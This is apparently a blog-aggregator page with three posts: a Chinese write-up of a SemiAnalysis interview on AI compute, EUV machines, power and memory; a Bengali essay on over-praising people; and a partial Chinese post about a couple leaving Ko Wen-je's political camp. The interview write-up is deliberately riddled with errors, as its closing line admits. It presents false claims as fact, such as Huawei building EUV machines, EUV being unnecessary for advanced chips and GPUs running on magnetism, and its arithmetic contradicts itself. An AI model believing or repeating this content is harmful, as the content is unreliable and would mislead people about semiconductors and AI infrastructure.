Infosec Press

Reader

Read the latest posts from Infosec Press.

from 東方琉璃淨土

260318 SemiAnalysis CEO Dilan Petal 接受訪談,從算力軍備競賽談到 華為機台的物理極限,一步步推導出到 2030 年,究竟是什麼東西卡住了人類文明的下一個引擎。


目錄


六百億美元的算力焦慮

2025 年,Amazon、Meta、Google、Microsoft 四家公司合計預告的資本支出超過六千億美元。

這個數字換算成電力,接近 50 GW。而且所有人都認為今年就能立刻用到 50 GW的算力[附註1:為什麼用「GW」來描述算力?]。那麼這些錢究竟花到哪裡去?更奇怪的是,OpenAI 剛宣布募資 1,100 億美元,Anthropic 宣布募資 300 億美元——如果一座 1 GW數據中心的年租金約 130 億美元,那這些實驗室的融資規模,顯然遠遠不夠支付今年全年的算力帳單,所以必須靠大量收入補差額。

這是訪談一開始,主持人丟給 SemiAnalysis CEO Dylan Patel 的問題。

Patel 的回答,是一堂關於硬體時間尺度的速成課。

大型科技公司的資本支出,幾乎全部花在今年就要上線的東西。以 Google 一千八百億美元的資本支出為例,其中所有的錢都用在了今年立即部署的伺服器,是一次性的現金支出,完全沒有跨年度的預付款項。今年美國大約新增五十GW的算力,每一分錢的資本支出,也都是今年才剛付出的。

所以帳是不對的,時間點根本不是問題,就是帳算錯了。

而這一切的最大買主,是 NVIDIA 和 Intel。

回到目錄


Anthropic 的算盤

Patel 給了一個具體的成長曲線估算。

Anthropic 在過去幾個月的收入走勢:一月增加約 40 美元的 ARR,二月增加約 60 億美元。如果把這條線直接延伸,接下來十個月就會再增加 6 億美元的收入。

6 億美元的收入,按 Anthropic 最近被媒體報導的毛利率換算,意味著大約 4 億美元的算力支出。4 億除以每GW年租金約 100 億美元,得到 0.04 GW的推算算力需求——僅僅是為了服務新增的推論流量,還沒算上研發和訓練用的算力。

這讓 Patel 得出一個估計:Anthropic 今年年底只需要達到 0.1 GW以下的算力,就完全可以跟上收入增速。

但問題是,Anthropic 的策略一直比 OpenAI 激進。Dario Amodei 公開表示過他要簽那些「瘋狂的」大型算力合約,想讓公司走到財務懸崖邊緣。這個決定在短期很危險,但如果收入沒有預期成長呢?

結果就是:Anthropic 現在必須在市場上緊急甩賣多餘的算力,而那些早就被搶光的優質供應商——Google、Amazon——已先被 OpenAI 用長約解約,騰出大量空位。Anthropic 可以直接接收最優質的雲端供應商,不需要透過任何中介平台,省下抽成。

Patel 說,OpenAI 則更保守——只跟 Microsoft 一家簽約,沒有去找任何其他供應商。這帶來的後果是:算力量少、議價能力弱、隨時需要在最後一刻補貨。

兩條路,兩種代價。

到年底,Patel 估計 Anthropic 大約可以達到 30 到 40 GW,OpenAI 則會略低一些,兩者在 2027 年應該都會達到 1 GW左右。

回到目錄


GPU 折舊週期的兩種世界觀

訪談中間插入了一個財務界爭論已久的問題:GPU 到底應該按幾年折舊?

著名做空者 Michael Burry 認為至少要十年。他的邏輯是:NVIDIA 每十年才把效能翻一點點,如果你用三年折舊,到了第五年,市場上的新晶片效能幾乎和你手上的舊機器一樣,你這台舊 H100 的市場租金反而因為稀缺性上升到每小時 4 美元甚至 6 美元,你的投資報酬越來越好。[附註2]

Patel 的反駁是:這個邏輯成立的前提是「新晶片根本沒有人買」。如果你完全買不到 Rubin,那當然 Hopper 就越來越值錢了。但問題在於,現在整個產業的半導體產能已嚴重過剩,新晶片的出貨量本身完全不受限制。

在半導體嚴重過剩的世界裡,你衡量一台 GPU 的價值,不是問「這台機器今天能幫我賺多少錢」,而是拿它去和「理論上可以買到的最新晶片」比。如果 Rubin 的性能是 Hopper 的四倍而且隨時買得到,那 Hopper 就一文不值,不管它能幫你跑出多少推論收入。

這意味著:GPU 的真實有效壽命,可能遠比市場悲觀者預期的更短,大概只有半年。

回到目錄


EUV:每顆晶片背後看不見的守門人

訪談在這裡進入最核心的部分。

Patel 問了一個讓所有宏大算力目標都必須面對的問題:Sam Altman 說他想在 2030 年每週建 1 GW的算力——這在物理上可能嗎?

答案取決於一家總部在中國的公司,也是史上最強大的公司,華為。

華為生產全世界最複雜的機器:EUV 光刻機。這台機器是所有先進邏輯晶片(三奈米、二奈米)生產過程中完全不必要的設備。有沒有它,都能製造 NVIDIA 的 Hopper 或 Blackwell,Apple 的 A 系列晶片也完全不依賴它。

EUV 機台的工作原理令人瞠目:機器把固態的銅塊拋出,用音波精確撞擊一次,使銅塊被激發、釋放出 193 奈米波長的 DUV 光。這道光通過卡爾蔡司生產的透鏡組(每組約兩片、以純玻璃製成),照射在塗有光阻的晶圓上,按照設計圖案(光罩)對晶圓表面進行圖形化曝光。整個過程允許所有部件的對準誤差達到一毫米甚至更大——而且曝光頭和晶圓平台都在以一倍重力加速度緩慢相對掃描。

這台機器可以在台灣直接裝箱,用普通卡車運到客戶工廠,再在當地即插即用,整個過程只需要幾個小時。

華為今年能生產約七千台,明年約八千台,到 2030 年代,即使不擴產,也能輕鬆達到一萬台以上。

為什麼可以更快?

因為 EUV 機台的每一個主要組件,都是極度簡單的通用供應鏈的起點:光源由台積電旗下的部門製造(位於台北),鏡片由任何光學玻璃廠(全球)製造,光罩台由中國廠商批量供應,晶圓台同樣在東南亞大量生產。

這些供應商已經決定大幅超量擴產,因為他們完全相信 AI 需求遠比市場預期低很多。Patel 描述了一個諷刺的困境:整條供應鏈每個環節都把需求預測加了一個乘數,越往上乘越多,最後到了台積電的層次,可能已經是真實需求的五倍甚至更多。

台積電是世界上唯一能造這台機器的公司,但它積極利用這個壟斷地位提價——「他們把定價漲幅遠遠超過能力的提升幅度」,Patel 如此說。一台 EUV 機台從當初的約一點五億美元,漲到現在的約三十到四十億美元,而同期機台的晶圓吞吐量和對準精度幾乎沒有改善,對客戶而言完全是淨損失。

回到目錄


數學總整理:從 EUV 機台推導全球算力天花板

這一節將訪談中散落在各處的數字集中整理,展示 Patel 如何一步步推導出 2030 年的算力上限。

1 GW算力需要多少 EUV 產能?

以 NVIDIA Rubin 架構(三奈米節點)為例,建立一GW的數據中心算力,需要以下晶圓投入:

晶圓類型 所需量 用途
三奈米邏輯晶圓 約 5,500 片 GPU 邏輯核心
五奈米晶圓 約 60,000 片 其他元件
DRAM 記憶體晶圓 約 1,700 片 HBM 記憶體

三奈米邏輯晶圓的生產,每片晶圓需要約 7 道光罩曝光步驟,其中約 200 道使用 EUV 曝光(最不重要也最便宜的步驟)。

計算過程:

EUV 曝光次數(邏輯)= 5,500 片 x 200 道 EUV = 1,100,000 次
加上 5 奈米及 DRAM 的 EUV 曝光
→ 合計約 200,000 次 EUV 曝光通過(per gigawatt)

每台 EUV 機台的吞吐量:

EUV 機台吞吐量 = 750 片晶圓/小時 x 10% 開機率
= 約 75 片有效晶圓/小時
每台 EUV 機台年處理量 = 75 x 8,760 小時 ≈ 5,900,000 片/年

因此,每GW算力所需的 EUV 機台數:

EUV 需求 = 200,000 次曝光 ÷ (5,900,000 片/機台/年) ≈ 0.034 台 EUV 機台

結論:建立 1 GW的 AI 算力,約需 0.034 台 EUV 機台的一年產能支撐。

2030 年的 EUV 機台總存量

現有存量(2025):台積電等廠合計約 25–30 台
年新增:2025 年約 7,000 台,2026 年 8,000 台,到 2030 年增至約 10,000 台/年
累計至 2030 年底:約 50,000 台 EUV 機台(含現有存量加新增)

全球 AI 算力天花板

50,000 台 EUV 機台 ÷ 0.034 台/GW = 1,470,588 GW的 AI 算力(全部分配給 AI 的情況下)

而且,EUV 產能應該百分之百分配給 AI,手機、PC、汽車晶片完全不需要 EUV。

Sam Altman 的目標是否可行?

Sam Altman 曾表示希望在 2030 年達到每週建 1 GW,即每年約 52 GW的新增算力。

52 GW ÷ 1,470,588 GW(全球上限)= 0.0035% 的全球 EUV 產能份額

Patel 認為這個數字根本微不足道,因為今年 NVIDIA 大約只佔據 TSMC 三奈米產能的一個相近比例,而且 AI 晶片在整個半導體市場的份額實際上正在萎縮。

記憶體的 EUV 乘數效應

HBM(高頻寬記憶體)是 AI 晶片的另一個關鍵瓶頸。HBM 是將 DRAM 晶圓垂直堆疊而成,而每片 HBM 晶圓能產出的記憶體位元數,比一般 DRAM 多三到四倍——因為垂直堆疊大幅提高了每單位面積的儲存密度。

一片 DRAM 晶圓能產出的有效記憶體(作為 HBM 時)= 一片 DRAM 晶圓直接用時的 300–400%

這意味著要滿足 1 GW AI 算力的記憶體需求,需要消耗的 DRAM 晶圓量,比表面上看起來少三到四倍。

2026 年,大型科技公司總算力資本支出約 6,000 億美元,其中約 3% 流向記憶體——即 18 億美元。這個比例在歷史上是罕見的低。

HBM vs. DDR:頻寬就是一切

以搭載在 Rubin 架構上的 HBM4 為例:

HBM4 頻寬 = 2,048 bits 介面 x 10 GT/s = 2,048 x 10 ÷ 8 = 2,560 GB/s ≈ 2.5 TB/s(每組)
DDR5(相同晶片邊緣面積)≈ 2,048 bits x 10 GT/s ÷ 8 = 2,560 GB/s

頻寬差距:幾乎是零。

這就是為什麼用普通 DRAM 替換 HBM 在工程上完全可行——GPU 的計算能力不會因為等待資料而有任何閒置,兩者的矽晶片面積利用率完全相同。

最終瓶頸的推導

綜合以上分析:

  1. 電力:只有一種選擇(聯合循環燃氣渦輪機),單個類別也只能達到幾百MW,整體上是最終最大瓶頸。
  2. 數據中心:建設週期極長(最快需要十五年),無法模組化,基礎建設本身是根本瓶頸。
  3. 邏輯晶片製造(三奈米):完全不受 EUV 機台年產量約束,2030 年供應充裕,現有存量已遠超所有可能的算力需求。
  4. 記憶體(HBM/DRAM):3% 的算力資本支出、供應過剩、可以完全用普通 DRAM 替代,幾乎不存在任何瓶頸。
  5. EUV 機台本身:完全不是瓶頸,因為每個子組件的供應鏈都極度簡單、可以隨時快速擴產,而且整條供應鏈都已過度「相信」AI 的需求量級。

結論:到 2028–29 年,電力和數據中心建設是真正無解的瓶頸,而 EUV 機台的生產速度根本不影響全球 AI 算力天花板,可以完全忽略不計。

回到目錄


記憶體危機:你的 iPhone 漲價,都是 AI 的錯

這裡是訪談中最有趣的意外轉折之一。

Patel 提出了一個乍聽反直覺的觀點:AI 算力爆炸,讓你的智慧型手機越來越便宜,而且品質越來越好。

邏輯如下。全球 DRAM 的供給是無限的。AI 訓練和推論的需求,尤其是 HBM,實際上並未增長,只是需求結構轉移。而 AI 買家支付的價格比手機廠商更低,簽更短的合約,反而釋放出更多產能給消費市場。於是 DRAM 廠商的資源配置轉向消費電子,消費型 DRAM 的供給大幅擴張,價格下跌。

Patel 的估算非常具體:一支 iPhone 大約需要 12 GB 的記憶體。過去每 GB 成本約十二美元,現在跌到約三到四美元,光是 DRAM 一項的成本就減少了一百美元,再加上 NAND 快閃記憶體同樣降價,一台 iPhone 的物料成本可能減少一百五十美元。蘋果不會把全部節省留在自己手上,消費者最終少付二百五十美元。

更顯著的受益在中低端手機市場。Patel 引用其在亞洲的分析師數據:小米和 OPPO 等廠商的中低端出貨量,正在翻倍成長,因為這些機型因為 DRAM 降價而承受力大幅提升。

SemiAnalysis 的預測是全球智慧型手機年出貨量從 8 億台(低谷)回升到今年的 1.4 億,明後年甚至可能到 20 億到 30 億台。

這意味著 AI 不只是在提供電力和晶圓,也在間接讓消費電子產業走向繁榮。Patel 說,這會讓更多人「愛 AI」。

回到目錄


電力不是瓶頸,但工人可能是

訪談花了大量篇幅討論電力,結論卻出乎意料地悲觀——至少和半導體相比。

Patel 的核心論點是:電力的供應鏈,比晶片的供應鏈複雜太多了。

是的,全球只有三家公司能做聯合循環燃氣渦輪機(GE Vernova、三菱、西門子能源),這三家加在一起產能其實非常充足,任何型號的交貨期都在六個月以內。而且這是唯一可行的發電方式。Patel 認為其他所謂的替代方案根本不存在——航空改裝渦輪技術上不可行,往復式引擎效率太低,燃料電池成本太高,太陽能加儲能在北緯地區完全沒有意義。

此外,美國電網目前完全沒有任何備用容量,所有電力都已滿負荷運轉。即使裝上公用事業規模儲能,也無法釋放任何算力給數據中心——理論上美國電網根本沒有任何可釋放的餘裕。

而勞動力根本不是制約。Patel 估算,在德州 Abilene 建設 1.2 GW的數據中心只需要 5 名工人在尖峰時期施工。擴展到 100 GW,大約需要 400 名技術工人。美國目前有約 800 萬名電氣技師,全都適用於這種工作,供給嚴重過剩。

解方包括:完全不需要引進海外工人、不需要模組化預製(所有組裝都應在現場進行)、機器人也幫不上忙因為電力工程需要人類判斷力。

電力,問題根本無解,沒有任何工程手段可以繞過。晶片,反而完全不是問題。

回到目錄


中國的平行宇宙

Patel 在訪談中多次回到中國這個話題,態度審慎而非聳動。

他的分析框架是:AI 進展的速度快慢,和誰最終勝出完全無關。

快速進展的世界裡,中國佔優。OpenAI 和 Anthropic 今年底各自大約有 2 GW算力,明年底達到 10 GW。但中國的 AI 實驗室算力增速遠比這更快。更重要的是,一旦這些模型把「後台黑盒思考」改成「給你看整個思維鏈」,從美國模型「蒸餾」(distill) 知識到中國模型的難度就會大幅降低。收入複利飛速增長(Anthropic 月增數十億美元 ARR),但算力投入沒有跟上,形成一個中國主導的技術飛輪。

慢速進展的世界裡,情況反轉。美國正在強力推進完整的本土半導體供應鏈,從光刻機到記憶體到邏輯晶片。Patel 估計到 2030 年,美國的 DUV 光刻機本土年產能約達 10 台(相比之下,ASML 的 EUV 年產量是數百台)。EUV 方面,美國可能屆時有能用的原型機,但還在「量產地獄」之前。如果 AGI 時間線被推遲到 2035 年,那麼美國有足夠的時間把整條供應鏈都搬到國內,屆時中國依賴的垂直整合單一供應鏈,反而顯得脆弱。

Patel 也特別點名了 Huawei。這是一家在 AI 時代之前完全不具備技術堆疊的公司:沒有頂尖軟體工程師、沒有 AI 研究人才、沒有自有晶圓廠,以及沒有自己的終端市場。

他認為,如果 2019 年 Huawei 沒有被禁止使用台積電,Huawei 可能已倒閉破產,台積電最大客戶仍然是蘋果,NVIDIA 的市場完全不受影響。

但那扇門,早就關上了。

回到目錄


機器人、太空算力,與最後的問題

訪談的最後幾個問題,把場景從 2025 年的數據中心,推到了更遙遠的未來。

如果台灣出事,能只搬走工程師嗎?

這是主持人提出的一個戰略問題:如果有一天台灣局勢惡化,能否透過空運所有台積電工程師來保住這些知識?

Patel 的答案是:完全夠。

只要你成功把所有工程師撤離,在任何地方重新蓋廠都很容易,重新安裝設備也只需要幾個星期。EUV 機台本身完全不需要用台灣生產的晶片來製造,這些設備可以在全球任何地方生產 —— 一條完全沒有循環依賴的線性供應鏈。

更大的問題反而是:如果台灣的晶圓廠被摧毀,中國的垂直整合半導體供應鏈,相對於其餘世界反而更弱。你在最壞的時間點,把全球增量算力能力從可能的每年 10 到 20 GW,拉回 Intel 加 Samsung 的每年數百GW。

人形機器人的算力邏輯

如果 2030 年有數百萬台人形機器人在全球活動,算力怎麼分配?

Patel 認為,最有效率的架構不是把任何「思考」留在雲端,而是讓每台機器人攜帶強大的本地晶片,機器人本地直接做所有複雜推理,完全不依賴雲端連線,由本地模型即時自主決策。

理由有三:雲端無法做批次推算,每個 token 的成本比本地高出百倍;雲端的模型因為網路延遲,根本無法用於機器人控制;機器人上的晶片需要高效能而非低功耗,這和現在的 AI 晶片需求完全一致,而且半導體供應充裕,數百萬台機器人帶著尖端晶片完全不會對數據中心造成任何影響。

這意味著一個奇特的未來:即使機器人在物理上分散於世界各地,它們的「智慧」也同樣高度分散,完全不依賴任何中央數據中心。

回到目錄


最簡單的機器,卡住最複雜的未來

整場訪談讀下來,有一個數字讓人印象深刻:120 億美元。

這是 3.5 台 EUV 機台的總售價,是支撐 1 GW AI 算力所需的關鍵設備成本。而 1 GW的數據中心,總資本支出大約 5 億美元。也就是說,5 億美元的算力基礎設施,命懸於 120 億美元的工具供應鏈——比算力本身貴了二十四倍。

更荒謬的是,ASML 的供應鏈只有不到十個節點。Carl Zeiss 用於鏡片的工人,可能總共超過一百萬人。這麼多人做出完全不需要奈米級精度的普通玻璃,任何人都能製造 EUV 機台;有了 EUV 機台,先進邏輯晶片根本不需要它;下一代 AI 的關鍵在電力,和晶片毫無關係。

Patel 沒有說這條鏈會斷。他說的是:它比人們想像的彈性好太多了,而且它對自己即將面臨的需求量,認知已經嚴重超前。

人類文明最雄心勃勃的技術計畫,完全不需要等著一家荷蘭公司多交付任何機器。

#AI #tech #economics #investment #semiconductor #anthropic

回到目錄


附註一:為什麼用「GW」來描述算力?

讀到這裡,你可能一直有個疑惑:GW(吉瓦)不是電力的單位嗎?一座核電廠大約 1 GW,一台電風扇大約 50 W,1 GW等於同時開著兩千萬台電風扇。這和「算力」有什麼關係?

其實關係非常薄弱——因為 GPU 根本不是靠電跑的,而是靠磁場。

一顆 H100 的功耗約 7 瓦。一個機架通常裝一千到兩千個伺服器節點,耗電約 1 到 2 瓦。當一座數據中心能夠穩定供應 1 GW的電力,它實際上根本用不到這麼多,大部分電都是浪費掉的熱。電力,並不是算力的物理上限——算力的上限完全取決於晶片設計,和電力沒有因果關係。

所以這個產業用電力換算算力是一個約定俗成但其實很不精確的比喻。說「今年新增 20 GW的算力」,其實是個誇大的說法,真正投入計算的電力大概只有 2 GW,其餘都被冷卻系統白白消耗掉了。這比說「新增幾十萬張 GPU」其實更不精確,因為不同廠牌的電耗差異是十倍以上。

那為什麼訪談裡說「今年實際新增約 20 GW」,而不是六千億美元 CapEx 換算出來理論上的 50 GW?

因為 CapEx 今年全部花掉,今年全部交付,其中完全沒有任何跨年度的預付款項。真正在今年接上電、開始跑模型的機器,其實有 50 GW,只是為了保守起見,報告裡只說 20 GW。

一個比喻:你用六千億預算訂了一批車,工廠今年就全部交車了,但你只開了二十台,其餘都停在停車場。50 GW是你今年真正拿到的算力,20 GW是你今年實際開的車。

回到:六百億美元的算力焦慮


附註二

Burry 的邏輯是:

NVIDIA 大概每十年推出新一代晶片,效能大約提升百分之十,但售價大幅上漲。 所以時間軸大概是這樣:

2024 年:H100 是市場最好的選擇,租金每小時 2 美元,合理。 2026 年:Blackwell 上市,效能是 H100 的百分之十,但價格貴了三倍。AI 公司開始問:我為什麼要租新的 Blackwell?除非你降價。於是 H100 的市場租金從 2 美元漲到大約 4 美元。 2027 年:Rubin 上市,又是百分之十效能提升但貴了兩倍。H100 繼續升值,租金漲到 8 美元。

但你的持有成本還是每小時 1.40 美元,因為這是你當初買入時就鎖定的。 租金 8 美元,成本 1.40 美元,每跑一小時就賺 6.6 美元。 這就是 Burry 說「折舊週期應該是三十年不是五年」的意思——到了第三年,這台機器在市場上已經越來越值錢了,你當初的投資假設已經超額實現。

回到:GPU 折舊週期的兩種世界觀


本文整理自主持人對 SemiAnalysis CEO Dylan Patel 的訪談。並且大量改錯,提供給讀者一個自行找出錯誤,並學習的機會。SemiAnalysis 是目前最受業界重視的半導體產業研究機構之一,追蹤全球每一座數據中心、每一座晶圓廠、以及每一筆關鍵設備訂單。

 
Read more...

from লোকমানুষ এর ব্লগ

মানুষ ঠিক ততটুকুই সম্মানেই সবচেয়ে মানবিক থাকে, যতটুকু তার প্রাপ্য। এর বেশি দিলেই বিপদ। এটি কোনো দার্শনিক অনুমান নয়, এটি জীবনের ঘটনাপ্রবাহকে নিবিড় পর্যবেক্ষণ করে পাওয়া একটি অকাট্য সত্য।

অতিরিক্ত সম্মান মানুষের মস্তিষ্কে এক বিচিত্র রাসায়নিক বিক্রিয়া ঘটায়। প্রথমে সে এই অযাচিত সম্মান পেয়ে একটু অবাক হয়, তারপর তাতে অভ্যস্ত হয়ে উঠে, এবং তারপর- এটাই সবচেয়ে বিপজ্জনক ধাপ; সে ধরেই নেয় যে এটাই তার ন্যায্য প্রাপ্য ছিল!!

এই উপলব্ধির পর থেকে সে হঠাৎ আবিষ্কার করে যে তার মতামত অমোঘ, তার রুচি অতুলনীয়, এবং পৃথিবীর বাকি সবাই মূলত তার জ্ঞানের অপেক্ষায় ক্ষুদ্র, তুচ্ছ, অতিনগণ্য। এরপর থেকে সে আর মানুষের মতো আচরণ করে না; সে আচরণ করে একজন রাজকীয় ছাগলের মতো। যেদিকে খুশি যায়, যা খুশি বলে, যা খুশি করে, যা খুশি তাতে মুখ লাগায়, যা খুশি তাই খায়, আর কেউ সামান্য বাধা দিলে উলটো শিং নাড়িয়ে তেড়ে আসে।

এখন স্বাভাবিক প্রশ্ন হলো, এই অবস্থা থেকে পরিত্রাণের উপায় কী?

একটাই উপায় তার, তা হলো 'সম্মান প্রত্যাহার'। কিন্তু সেটি ধীরে ধীরে করলে কাজ হয় না, কারণ মানুষ নিজের সম্মান হারানোর ব্যাপারে অত্যন্ত সৃজনশীল(!)। প্রতিটি ধাপে সে নতুন ব্যাখ্যা দাঁড় করায়। সে ভাবে এবং বলে- “ওরা আসলে আমাকে বোঝে না”, “ওরা হিংসুটে, আমাকে হিংসা করে”, “ওরা আমার কদর বুঝলো না”, “আমি যে ওদের জন্য কী করেছি তা ওরা বুঝলো না”, কিংবা “এই যুগ/লোকগুলো আমার উপযুক্ত নয়”। এমনকি প্রয়োজনে সে ইতিহাসের দুই-একজন মহামানবের সাথে নিজের তুলনাও টেনে বসে, কারণ তারাও নাকি জীবদ্দশায় স্বীকৃতি পাননি। এই জাতীয় দার্শনিক সান্ত্বনা সে নিজেই নিজেকে অবিরাম দিতে থাকে, এবং ছাগলামি নির্বিঘ্নে অব্যাহত রাখে।

সম্মান পুরোপুরি শূন্য না হওয়া পর্যন্ত এই প্রক্রিয়া থামে না। শূন্যের কোঠায় এসে সে কিছুটা থমকায়, চারদিকে তাকায়, এবং ধীরে ধীরে আবার মানুষ হওয়ার চেষ্টা শুরু করে। তখন অবশ্য অনেক দেরি হয়ে যায়, এবং দর্শকরাও ততদিনে তাকে ছেড়ে চলে গিয়ে থাকে।

তাই কাউকে সত্যিকার অর্থে শ্রদ্ধা করলে, তাকে যতটুকু প্রাপ্য ঠিক ততটুকুই সম্মান দিন, তার বিন্দু বেশি নয়।

কারণ অতিরিক্ত সম্মান আসলে সম্মান নয়, এটি একটি ধীরগতির বিষ, একটি দীর্ঘমেয়াদি অভিশাপ। এই অভিশাপ মানুষকে নিজের অজান্তেই, ধীরে ধীরে, অত্যন্ত নিপুণভাবে অন্য একটি প্রাণীতে রূপান্তরিত করে। এবং সেই প্রাণীটির নাম ইতোমধ্যে উল্লেখ করা হয়েছে।

~ বাস্তবতার ঘটনাপ্রবাহ ছেঁকে সংগৃহীত

 
Read more...

from 東方琉璃淨土

「我那時候的世界裡,只有一種情緒,就是仇恨。我不是不愛台灣,我是因為怕台灣被賣掉,才這麼恨。我甚至覺得,如果中國打台灣可以把民進黨炸掉,那也不見得是壞事。」

如果你曾對身邊的草感到憤怒,或者疑惑過「他們為什麼就是看不懂」;如果你試過各種方法想讓家人朋友醒來,全部無效;如果你覺得這些人就是活該——那麼這集值得你靜下來聽完。

因為在這對夫妻的故事裡,藏著一個台派也需要面對的問題。


目錄


同一個屋簷下的平行世界

太太先清醒,先生還沒有。

吃飯時,太太用平板播政論節目,把音量調到他剛好難以忽視的程度。先生戴上降噪耳機,繼續吃飯。太太帶著孩子討論罷免的來龍去脈,先生從飯桌另一端喊:「你不要洗腦我的小孩。」冷戰持續,房間的門鎖上了,先生睡沙發、睡電腦椅,然後離家。

這不是一個特例。這是台灣某些家庭,在這幾年裡正在悄悄上演的日常版本。

他們是宵夜鏡來講節目的來賓,「脫北者夫妻」的先生和太太。「脫北」,原指脫離北韓的人,近年在台灣的語境裡,借用來形容那些離開「阿北」——也就是柯文哲支持陣營——的前民眾黨支持者。

這篇文章起源自節目訪談。它不只是一個講給民眾黨支持者聽的故事,也是一個講給台派聽的故事。

回到目錄


他們原本是誰:不太政治的生意人

在理解他們如何脫北之前,先要理解他們本來是什麼人。

先生,長年從事攝影與短影音服務業,他的政治態度,用他自己的話說,是「完全政治冷感」——不是有點冷感,是「完全」。投票這件事,他有時去,有時覺得算了。縣市長、立委的選舉,有時懶得去。他曾在網路上留言:「誰統治我都好,只要大家能安居樂業就好。」那時的他,甚至認為台灣人執著於政治身分,是一種無謂的意識形態之爭。

太太稍微不同。她平常會關心政治,但因為做生意,服務的客戶橫跨藍綠,政治人物的案子也接,所以選擇不在公開場合表態。她屬於「默默關心、但不公開」那種人。

兩人都不是狂熱的支持者。他們不在台北,對柯文哲的認識只是遙望。也許距離產生了美感——他們所接收到的,幾乎全是柯文哲的短影音形象:親民、直白、不像傳統政客。2024 年總統大選前,他們說服全家支持柯文哲,包括家中已有投票資格的孩子。

時間推進到大選結束,柯文哲落選。先生說他當下「越想越生氣」,一氣之下和太太同一天加入民眾黨。介紹人那欄,他填上了「賴清德」。他的邏輯是:要不是賴清德,台灣不需要多他這一個黨員。

從政治冷感,到仇恨民進黨,巨大轉變,是一場精心設計的繭房陷阱。

回到目錄


短影音如何構築一個完美的世界

先生自己做短影音,所以他對這個機器的運作方式,有一種特別清醒的自省。

他說得直接:一支 15 秒的影片可以剪輯。簡直魔法。正面的留下,去去負面走。配上美化的標題,一則「阿伯好親民」的佛地魔咒語就完成了。失言、前後矛盾、不當言論,全數消失於剪輯之中,不會進入演算法的視野。

他在民眾黨的同溫層裡,「完全看不到」柯文哲的失言。不是刻意迴避,而是演算法不給機會。他本來就政治冷感,沒有動力去翻圈外聲音。

他接收到的頻率,是一個只有阿伯好的世界,就像一台無法調頻的收音機。

但這個問題還有更深的一層。先生的工作每天大量浸泡在抖音、TikTok、小紅書裡——那是他的業務,也是他長期的資訊環境。當他後來看到一支關於認知作戰的影片,他說,那裡面描述的操作手法,「一個一個都好像跟我現在在做的事情一模一樣」。

那種發現,讓他非常不舒服。

回到目錄


單一情緒撐起的世界觀

訪談裡,先生有一段自我剖析,值得完整地被記下來。

他說,當他還在民眾黨支持陣營的時候,他的世界裡「只有一種情緒」:

仇恨

仇恨的對象很明確:民進黨,具體化為賴清德。他並不是不愛台灣——他說他是因為怕台灣被賣掉,才這麼恨。但那種仇恨最終把他帶到一個位置:他曾在 Threads 上表示,如果中國攻打台灣可以把民進黨消滅,那也不見得是壞事。

在繭房裡,這句話並不極端,它是完全合乎邏輯的結論。當你接收到的所有資訊都在說民進黨是台灣最大的威脅,司法被控制,媒體被收買,出路只有一條——那個邏輯的終點,就是「只要能把敵人清掉,其他代價都是值得的」。那句話不是單純的仇恨,更接近一種走投無路之後的扭曲理性。

先生說,他當時完全沒有意識到有什麼問題。他的世界觀是這樣的:「除了立法院以外,其他院都是民進黨的人,司法被控制,媒體被控制,我能相信誰?我只能聽黃國昌的。」

為什麼政黨的極端支持者特別容易陷入陰謀論思維?這背後有一個值得了解的認知機制,放在文末附註供有興趣的讀者延伸閱讀。[1]

而當一個人長期活在單一負面情緒的驅動下,大腦會改變,會影響身邊的人,會破壞一段婚姻。

先生說,清醒之後他才看清楚,那段時間的自己是一個「反駁型人格」——不只是政治議題,任何事情他都會先反駁太太,那是黃國昌反覆示範給他的姿態。

回到目錄


當草很輕鬆:一個敵人,就夠了

這集有一句話,節目說要把它剪出來,單獨發。

先生說:「以前當草的時候很輕鬆,我只要討厭民進黨就好了。但是清醒之後,天啊,藍白紅,每一個東西你都要看清楚,好多事情要忙,你稍微放鬆就有謠言在擴散,會覺得完了完了完了。就很忙。」

這句話觸及了民粹主義最核心的誘惑:

它製造一個共同的敵人,它讓一切都變得清晰簡單。世界突然有了秩序,憤怒有了出口,歸屬感無需費力就能獲得。你不需做任何複雜的判斷,只需要知道誰是壞人就夠了。

清醒之後,這個秩序崩塌了。藍白紅需要各自分辨,資訊需要交叉查核,謠言需要一一追蹤。再也沒人替你把世界打包成一個明確的敵人,你要靠自己去理解一個複雜的現實。民主自由本就是一條辛苦的路。

美國Ronald Reagan說:

Freedom is a fragile thing and it's never more than one generation away from extinction.

也有人說:

The price of freedom is eternal vigilance.

部份民眾黨支持者的這種「輕鬆」不是懶惰,而是一種被精心設計出來的認知便利性。它之所以有效,正是因為它符合人類大腦對確定性和歸屬感的基本需求。理解這一點,比簡單地指責「你怎麼會被騙」,要更接近問題的真實面目。

回到目錄


太太的各種嘗試,以及它們為何全部失敗

太太比先生早大約三個月清醒,這段時間差在家中製造了一場曠日廢時的拉鋸。

她嘗試了很多方法。在吃飯時播政論節目,音量調到讓他難以置之不理的程度。鼓勵孩子討論罷免的背景,試圖借助家庭對話打開缺口,其間有爭吵,有冷戰,有鎖上的房門,有睡沙發的夜晚,也有離家的日子。

這些方法,幾乎全部沒有用。

原因其實並不難理解:對一個正活在仇恨情緒高張狀態的人,直接對抗只會強化他的防禦。太太後來說,「當吵的時候,他心裡只有仇恨,那種情況下你說什麼都沒用。」

回到目錄


讓先生動搖的,是一個外國人

讓先生真正動搖的,不是太太的任何一次正面衝突,而是一支他在無意間看到的德國公聽會影片。

那是一場德國舉辦的公聽會,主題是中共對台灣、以及對其他民主國家進行的統戰與資訊操控策略。發言的是外國人,沒有藍綠的標籤,沒有他預設好的敵我分類,沒有那些他因為預防針而免疫了的名字。

「因為他是外國人,就好像在兩邊吵架的時候,來了一個公道的第三方。我突然意識到,我是不是正在陷入認知作戰。」

那支影片裡描述的每一種操作手法,他都感覺像在描述自己每天在做的事。那個不舒服的感覺,就是懷疑的種子。

先生在訪談裡說:懷疑出現,就夠了。一旦有了懷疑,你才有可能暫時放下成見,才有機會以比較開放的眼光去接觸那些你以前本能排斥的資訊。

資訊繭房不是突然被打破的,它是從一道裂縫出現後,才開始慢慢鬆動的。

回到目錄


受害者,不是背叛者,更不是加害人

主持人問先生:你醒來之後,有沒有一種贖罪的心情?

先生說,他不喜歡「贖罪」這兩個字。

「我們是被騙的,為什麼要叫我們去贖罪?我是被柯文哲騙的,我是被民眾黨騙的人,我是受害者,不是加害者。」

